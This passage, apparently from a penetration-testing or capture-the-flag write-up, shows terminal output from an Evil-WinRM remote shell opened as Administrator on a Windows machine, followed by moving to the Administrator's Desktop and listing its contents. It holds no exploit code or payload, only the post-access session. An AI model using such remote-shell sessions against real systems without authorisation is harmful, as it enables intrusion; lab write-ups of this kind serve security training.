Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents>
```

```text
*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ../
*Evil-WinRM* PS C:\Users\Administrator> cd Desktop
*Evil-WinRM* PS C:\Users\Administrator\Desktop> dir
```